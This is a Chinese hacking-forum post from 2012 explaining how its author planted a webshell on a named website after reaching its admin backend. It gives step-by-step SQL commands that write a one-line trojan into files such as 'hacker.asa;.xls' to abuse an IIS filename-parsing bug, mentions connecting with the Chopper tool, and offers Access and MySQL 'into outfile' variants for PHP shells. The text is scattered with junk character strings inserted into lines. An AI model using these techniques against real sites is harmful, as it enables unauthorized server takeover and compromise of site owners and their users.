好不容易进了后台,发现啥上传啊。备份啊多木有。
) B4 Y: W) z, K7 c+ D. cwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的. S$ K9 L0 B1 k0 L. P$ ]
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
. E+ N$ K: `- S1 z1 G% p% W然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:# q' u8 j, x/ |8 l( l
1.create table cmd (a varchar(50))
: P1 I1 Q' P* k) ~2.insert into cmd (a) values (‘‘)# V0 O# }6 O4 w
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
$ `& r8 `* ] M7 n: g' _(把表cmd的内容导出为物理路径的一个EXCEL文件)
* G" ^! \; v* c5 r2 I4.drop table cmd& |' {- N: z: n* R
利用IIS的BUG成功拿到了WEBSHELL。
8 i4 _ E* W! U7 x
+ i7 _1 k# s- p O9 E7 M/ }0 `直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
+ a% M! Z4 q5 y; ~- h
) L, s2 Q9 \/ W3 r( L SQL语句意思解释:
( w4 t& w8 l7 L+ ]: x9 V2 Y2 _ 第一句
) `) c4 _( }7 C 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
2 b: n' `5 y. n1 {$ u1 z) \/ H: U' w, W5 C
第二句1 D( `0 K5 I: {) o' T2 P
在表cmd的a字段插入一句话木马
0 j/ R8 J# s' S# v 第三句
- E1 Z0 r( Z. a& o9 y! o. @ 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件7 K8 @* l/ T* z8 R P
+ @, H& y$ y- k5 U. @* L
第四句
3 \/ a0 ^: r9 u& ] 删除建立的cmd表, t1 ^+ H1 D, A% l
; P) M/ q% v1 H! s9 {. {4 e
以下内容为测试:& M, }4 j5 a) N9 E$ ?( F4 H
Access利用后台SQL执行命令功能导出WebShell:( X5 N: o0 W% k2 i
这个更简单:% i% d. s! Q/ g! y5 ~1 M' Q
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
, i. ~- f$ n1 S' t' S8 c/ r 或者
. a- e( Z a4 R; C8 Q [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]! f7 G3 p% D4 W- S0 a
8 J0 t, {. U# _! m6 R9 L, f 后台有执行SQL语句功能(vote为已知表段)
. u0 X( Y. m4 i5 N* m( b 希望对大家有所帮助拿shell的又一个思路( I2 S. I, x( @
|
发表于 2012-9-13 17:53:58
收藏
支持
反对